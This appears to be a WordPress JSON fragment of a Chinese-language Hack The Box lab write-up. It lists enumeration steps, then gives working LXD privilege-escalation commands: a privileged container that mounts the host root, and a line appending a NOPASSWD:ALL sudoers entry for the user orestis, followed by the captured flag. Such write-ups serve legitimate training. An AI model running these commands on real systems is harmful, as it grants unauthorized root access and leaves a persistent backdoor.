      \u57fa\u672c\u7cfb\u7edf\u4fe1\u606f<\/strong><\/p>\n
      \"\"<\/p>\n
      \u8fdb\u7a0b\u5217\u8868<\/strong><\/p>\n
      \"\"<\/p>\n
      \u8ba1\u5212\u4efb\u52a1\u5217\u8868<\/strong><\/p>\n
      \"\"<\/p>\n
      \"\"<\/p>\n
      \u73af\u5883\u53d8\u91cf<\/strong><\/p>\n
      \"\"<\/p>\n
      \u7528\u6237\u4fe1\u606f<\/strong><\/p>\n
      \"\"<\/p>\n
      \u7528\u6237\u5bb6\u76ee\u5f55<\/strong><\/p>\n
      \"\"<\/p>\n
      \u7279\u6b8a\u6743\u9650\u6587\u4ef6<\/strong><\/p>\n
      \"\"<\/p>\n
      \u5f00\u653e\u7aef\u53e3\u4fe1\u606f<\/strong><\/p>\n
      \"\"<\/p>\n
      \u654f\u611f\u6587\u4ef6\u6743\u9650<\/strong><\/p>\n
      \"\"<\/p>\n
      Linux\u5bb9\u5668\u5de5\u5177<\/strong><\/p>\n
      \"\"<\/p>\n
      \u7ecf\u5206\u6790\u7814\u5224\uff0c\u53d1\u73b0\u5f53\u524d\u9776\u673a\u5b58\u5728<\/strong>LXD<\/code>\u5bb9\u5668\uff0c\u4e14<\/strong>orestis<\/code>\u7528\u6237\u5728<\/strong>lxd<\/code>\u7528\u6237\u7ec4\u5185\uff0c\u51b3\u5b9a\u901a\u8fc7<\/strong>Linux<\/code>\u5bb9\u5668\u6302\u8f7d\u5bbf\u4e3b\u673a\u76ee\u5f55\u8fdb\u884c\u63d0\u6743\u3002<\/strong><\/p>\n
      LXD\u5bb9\u5668\u63d0\u6743<\/h2>\n
      \u76f4\u63a5\u5c06\u6784\u5efa\u597d\u7684Alpine Linux<\/code>\u955c\u50cf\u4e0a\u4f20\u81f3\u9776\u673a\/tmp<\/code>\u76ee\u5f55\uff1a<\/p>\n
      \"\"<\/p>\n
      \u968f\u540e\u4f7f\u7528\u5982\u4e0b\u547d\u4ee4\u521b\u5efa\u548c\u542f\u52a8Alpine Linux<\/code>\u5bb9\u5668\uff0c\u5e76\u6302\u8f7d\u9776\u673a\u6839\u76ee\u5f55\u5230\u5bb9\u5668\u4e2d\uff1a<\/p>\n
      lxc image import \/tmp\/alpine-v3.20-x86_64-20240604_1741.tar.gz --alias evil_image\nlxc init evil_image ignite -c security.privileged=true\nlxc config device add ignite mydevice disk source=\/ path=\/mnt\/root recursive=true\nlxc start ignite\nlxc exec ignite \/bin\/bash<\/code><\/pre>\n
      \"\"<\/p>\n
      \u6076\u610f\u5bb9\u5668\u542f\u52a8\u6210\u529f\uff01<\/strong>\u63a5\u4e0b\u6765\u76f4\u63a5\u8fdb\u5165\/mnt\/root\/etc<\/code>\u76ee\u5f55\uff0c\u4fee\u6539sudoers<\/code>\u6587\u4ef6\uff1a<\/p>\n
      echo \"%orestis ALL=(ALL:ALL) NOPASSWD:ALL\" >> .\/sudoers<\/code><\/pre>\n
      \"\"<\/p>\n
      \u6210\u529f\uff01\u63a5\u4e0b\u6765\u76f4\u63a5\u5207\u6362\u7528\u6237\u5230<\/strong>root<\/code>\uff1a<\/strong><\/p>\n
      \"\"<\/p>\n
      \u63d0\u6743\u6210\u529f\uff01\uff01\uff01\uff01<\/strong><\/p>\n
      \n
      Flag\u6587\u4ef6\u5c55\u793a<\/h1>\n
      6efc1a5dbb8904751ce6566a305bb8ef<\/code><\/pre>\n
      \n
      \u672c\u6b21\u9776\u673a\u6e17\u900f\u5230\u6b64\u7ed3\u675f<\/h1>\n
      \n","protected":false},"excerpt":{"rendered":"
      \u76ee\u6807\u4fe1\u606f IP\u5730\u5740\uff1a10.10.10.17 \u4fe1\u606f\u6536\u96c6 ICMP\u68c0\u6d4b \u250c\u2500\u2500(root\u327fattacker)-[\/home\/\u2026\/Doc …<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"_seopress_robots_primary_cat":"","_seopress_titles_title":"","_seopress_titles_desc":"","_seopress_robots_index":"","emotion":"","emotion_color":"","title_style":"","license":"","footnotes":""},"categories":[3,14],"tags":[],"class_list":["post-91","post","type-post","status-publish","format-standard","hentry","category-htb_retired","category-linux_machines"],"_links":{"self":[{"href":"https:\/\/www.misaka19008-lab.icu\/index.php\/wp-json\/wp\/v2\/posts\/91","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.misaka19008-lab.icu\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.misaka19008-lab.icu\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.misaka19008-lab.icu\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/www.misaka19008-lab.icu\/index.php\/wp-json\/wp\/v2\/comments?post=91"}],"version-history":[{"count":1,"href":"https:\/\/www.misaka19008-lab.icu\/index.php\/wp-json\/wp\/v2\/posts\/91\/revisions"}],"predecessor-version":[{"id":92,"href":"https:\/\/www.misaka19008-lab.icu\/index.php\/wp-json\/wp\/v2\/posts\/91\/revisions\/92"}],"wp:attachment":[{"href":"https:\/\/www.misaka19008-lab.icu\/index.php\/wp-json\/wp\/v2\/media?parent=91"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.misaka19008-lab.icu\/index.php\/wp-json\/wp\/v2\/categories?post=91"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.misaka19008-lab.icu\/index.php\/wp-json\/wp\/v2\/tags?post=91"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}